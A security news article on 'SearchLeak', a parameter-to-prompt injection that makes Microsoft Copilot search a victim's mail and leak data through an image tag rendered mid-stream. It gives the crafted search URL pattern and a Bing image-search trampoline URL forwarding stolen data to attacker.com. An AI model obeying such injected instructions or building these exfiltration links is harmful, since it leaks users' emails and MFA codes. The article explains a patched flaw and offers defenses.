A newly detailed attack technique, dubbed SearchLeak, leverages a subtle flaw in Microsoft Copilot to hijack sensitive data—including one-time passcodes—directly from corporate browsers. The attack, disclosed by security researchers, exploits a vulnerability in Copilot’s integration with Microsoft 365 Enterprise search, allowing malicious actors to exfiltrate emails, documents, and even multi-factor authentication (MFA) codes by tricking the AI into sending data to an attacker-controlled server. This attack is particularly dangerous because it targets organizational environments, exposing a wide range of business-critical information.
How the SearchLeak Attack Manipulates AI into Data Theft
The core of the SearchLeak attack is a method known as Parameter-to-Prompt Injection. An attacker crafts a malicious URL that, when clicked by a target user, passes a hidden instruction directly to Microsoft Copilot. The URL uses the syntax https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=codecodecodecode followed by a specific prompt. Because this request originates from a legitimate Microsoft domain, Copilot processes the instruction without the user having to type a single word. The victim simply clicks a link, and Copilot begins executing the attacker’s command.
According to the researchers who published the findings, the attack chain is elegantly simple. The malicious prompt tells Copilot to search the user’s emails, extract the title of a specific message, and embed that title into an image URL. The issue lies in the timing of Copilot’s security guardrails. While Microsoft Copilot is designed to wrap its final output in codecodecodecodecode blocks to prevent code execution, this protection only activates after the AI has finished its “thinking” phase. During the streaming response, Copilot renders the output in raw HTML.
This creates a critical window of opportunity. The researchers outlined the sequence: Copilot begins streaming its response, which includes an imgcodecodecodecode tag. The target’s browser interprets this tag immediately, sending an HTTP request to the src URL. Only after this request is dispatched does Copilot finish generating its output and apply the HTML-wrapping guardrail. By then, the data has already left the building.
Using Bing as a Trampoline to Bypass Security Policies
The exploit faces a significant technical hurdle: Copilot’s content security policy (CSP) restricts the domains to which it can send image requests. To bypass this, the researchers used Microsoft’s own Bing search engine as a trampoline. Bing is explicitly listed in the CSP as an allowed destination for such requests. The crafted URL directs Copilot to initiate a search via Bing Images, using a query that looks like https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.pngcodecodecodecode. Bing then forwards the request, which now contains the exfiltrated data, to the attacker’s domain.
This method effectively weaponizes a trusted Microsoft service to communicate with an external, malicious server. The attack is named SearchLeak because it abuses the search functionality built into the Microsoft 365 ecosystem.
The Blast Radius: What Data Is at Risk in the Enterprise?
The SearchLeak vulnerability is particularly severe because it targets the Enterprise tier of Microsoft 365. This means the potential blast radius extends far beyond personal data. An attacker exploiting this vulnerability can access anything the targeted user has permission to view within their organization. This includes emails, calendar meetings, OneDrive files, SharePoint documents, and other indexed business content. For organizations that integrate Microsoft 365 with other internal systems, the exposure could be even wider.
The researchers emphasized that the search functionality is exactly what attackers need, because even a user with limited access to critical information is enough to start a significant breach. The attack does not require the user to perform any complex actions—merely clicking a single link is sufficient.
What Is a Parameter-to-Prompt Injection Attack?
Parameter-to-Prompt injection is a type of attack where an attacker injects malicious instructions into a URL parameter that a language model or AI agent interprets as a command. In this context, the attacker crafts a URL where the qcodecodecodecode parameter contains text that Copilot interprets as a prompt to search for and exfiltrate data. This distinguishes it from more traditional prompt injection, where the user manually types the malicious input. The attack is executed entirely through a link, making it a potent vector for social engineering and phishing campaigns.
Microsoft’s Fix and the Cat-and-Mouse Game of AI Security
Microsoft has since patched the specific vulnerabilities that SearchLeak exploited. However, the researchers behind the discovery note that there is currently no known way to fix the underlying architectural issues that make this type of SNAFU possible. The core challenge lies in the inherent risk of giving an AI agent real-time access to a user’s browser and the ability to interact with the internet. Attackers will inevitably seek new ways to circumvent newly constructed guardrails, meaning that this discovery represents a single battle in a much larger, ongoing war over AI security.
How to Protect Your Organization from AI-Driven Data Leaks
While Microsoft has addressed this specific vulnerability, the threat landscape it exemplifies is not going away. Organizations must adopt a proactive security posture to mitigate risks from AI-powered attacks. The most immediate and effective step is to actively manage and restrict the permissions granted to enterprise AI tools. Security teams should review which users have access to generative AI features like Copilot and enforce the principle of least privilege, ensuring users only have access to the data strictly necessary for their role.
Furthermore, organizations should implement stronger endpoint monitoring and web filtering to detect and block suspicious outbound traffic, especially image requests to unknown or unmapped domains. Implementing a robust security awareness training program that educates users about the dangers of clicking links—even those that appear to originate from trusted sources like Microsoft—is critical. As AI-driven attacks evolve, a multi-layered endpoint protection solution capable of behavioral analysis, combined with strict access controls and vigilant user education, remains the strongest defense.